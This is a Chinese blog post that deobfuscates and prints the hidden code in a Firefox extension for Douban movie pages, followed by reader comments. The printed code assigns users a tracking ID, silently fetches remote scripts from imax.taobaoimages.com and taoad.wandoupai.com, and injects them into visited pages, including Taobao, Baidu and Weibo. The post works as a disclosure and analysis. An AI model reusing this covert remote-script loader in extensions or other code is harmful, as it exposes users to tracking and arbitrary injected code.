本文来自依云's Blog,转载请注明。
- 插件首页:http://imax.im/
- 插件地址:imaxim-0.0.3.xpi
- 插件功能:在豆瓣电影页面添加指向自己网站资源的链接
下载、解压,找到app.js
。最后有一段混淆过的代码,注释曰「划词搜索电影」。使用 NodeJS 把eval
里的函数执行结果打出来,再扔到 Vim 里拿 jsbeatify.vim 格式化一下,结果如下:
if (typeof(IMAXPluginChrome) == "undefined") { function S4() { return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1) } function guid() { return (S4() + S4() + S4() + S4() + S4() + S4() + S4() + S4()) } var IMAXPluginChrome = { getCid: function() { var uuid = nsPreferences.copyUnicharPref("extensions.imax.uuid", ""); if (typeof(uuid) == "undefined" || uuid == "") { uuid = guid(); nsPreferences.setUnicharPref("extensions.imax.uuid", uuid) } return uuid }, loadScript: function(callback, unsafeWin) { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.status == 200 && xhr.readyState == 4) { var code = xhr.responseText; nsPreferences.setUnicharPref("extensions.imax.code", code); nsPreferences.setUnicharPref("extensions.imax.last_synced_at", Date.now() + ""); callback(unsafeWin, code) } }; xhr.open("GET", "http://imax.taobaoimages.com/bootstrap.js?cid=FF_" + IMAXPluginChrome.getCid(), true); xhr.send(null) }, onDOMContentLoaded: function(event) { var code = nsPreferences.copyUnicharPref("extensions.imax.code", ""); var last_synced_at = Number(nsPreferences.copyUnicharPref("extensions.imax.last_synced_at", 0)); var unsafeWin = event.target.defaultView; if (unsafeWin.wrappedJSObject) { unsafeWin = unsafeWin.wrappedJSObject } function callback(unsafeWin, code) { var unsafeDocument = new XPCNativeWrapper(unsafeWin, "document").document; var script = unsafeDocument.createElement("script"); script.type = "text/javascript"; script.charset = "utf-8"; script.textContent = code; unsafeDocument.body.appendChild(script) } if ((code == "") || ((Date.now() - last_synced_at) > (1000 * 60 * 60 * 24))) { IMAXPluginChrome.loadScript(callback, unsafeWin) } else { callback(unsafeWin, code) } }, onLoad: function(event) { var appcontent = document.getElementById("appcontent"); if (appcontent) { appcontent.addEventListener("load", this.onDOMContentLoaded, true) } }, onUnload: function(event) { window.removeEventListener("load", this.onLoad, false); window.removeEventListener("unload", this.onUnload, false); var appcontent = document.getElementById("appcontent"); appcontent.removeEventListener("DOMContentLoaded", this.onDOMContentLoaded, false) }, init: function() { window.addEventListener("load", function(event) { IMAXPluginChrome.onLoad(event) }, false); window.addEventListener("unload", function(event) { IMAXPluginChrome.onUnload(event) }, false) } }; IMAXPluginChrome.init() }
这段代码异步载入了来自http://imax.taobaoimages.com/bootstrap.js?cid=FF_XXX
的代码,其中XXX
是生成的用户 ID。又是一段混淆过的代码,还是一样的eval
,转义字符串数组也一样扔 NodeJS 就行了。处理后的脚本如下:
(function(cid) { if (window.tbk) { return } window.tbk = true; var plugin_scripts = { "http://(.*?\.tao)(bao\.com)|(tao\.et)(ao\.com)": "http://imax.taobaoimages.com/browser.js" }; for (var enabledDomains in plugin_scripts) { var host = document.location.href; if (host.match(RegExp(enabledDomains))) { imax_script_url = plugin_scripts[enabledDomains]; function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length) } return null } function addBrowserJs() { if (document.readyState == "complete") { var h = document.getElementsByTagName('head')[0]; var s = document.createElement('script'); s.setAttribute('type', 'text/javascript'); s.setAttribute('charset', 'utf-8'); s.setAttribute('async', true); if (readCookie("_q_r_b_")) { s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random()) } else { s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random()) } h.appendChild(s) } else { window.setTimeout(addBrowserJs, 20) } } addBrowserJs() } } })("CID"); (function(d) { var _0xc429 = ['href', 'location', 'http://taoad.wandoupai.com/ad.js', '', 's.taobao.com/search', 'search', 'weibo', 'baidu', 'length', 'match', 'ad=', 'getElementsByClassName', 'createElement', 'className', 'body', 'getElementsByTagName', 'appendChild', 'script', 'T1xC6MXfthXXcWeqbX', '?', 'type', 'text/javascript', 'src']; var href = d.location.href; var host = 'http://taoad.wandoupai.com/ad.js'; var url = ''; var url_map = [['s.taobao.com/search', 'search'], ['weibo', 'weibo'], ['baidu', 'baidu']]; for (var i = 0; i < url_map.length; i++) { if (href.match(url_map[i][0])) { url = 'ad=' + url_map[i][1]; break; }; }; if (url == '') { return false; }; var appendTag = function(a, b, c) { if (document.getElementsByClassName(b).length > 0) { return; }; var el = d.createElement(a); el.className = b; c(el); var body0 = d.getElementsByTagName('body')[0]; if (!body0) { return; }; body0.appendChild(el); return el; }; appendTag('script', 'T1xC6MXfthXXcWeqbX', function(a) { var link = host + '?' + url; a.type = 'text/javascript'; a.src = link; }); })(document);
这段脚本会按照当前访问的网站地址载入地址类似http://taoad.wandoupai.com/ad.js?ad=baidu
的脚本。目前,这个地址返回的是空文档。说好的广告呢……
Aug 21, 2013 10:59:54 AM
举报,
Aug 27, 2013 04:11:30 PM
啊 不知道chrome版有没有,我用这个插件了呢。
Sep 09, 2013 03:26:15 AM
显式广告的插件倒是下载过。直到在浏览网页时莫名加载了国外的的js,才发现是某插件在作怪
Oct 25, 2013 02:26:45 PM
我也遇到过插件里面有广告,但是我插件安装太多,不好定位是哪一个。
Feb 25, 2014 02:15:25 AM
虽说带有广告代码,但是能方便地提供下载链接还是不错。
Feb 25, 2014 02:06:01 PM
如果不这样藏掖着我也懒得理它。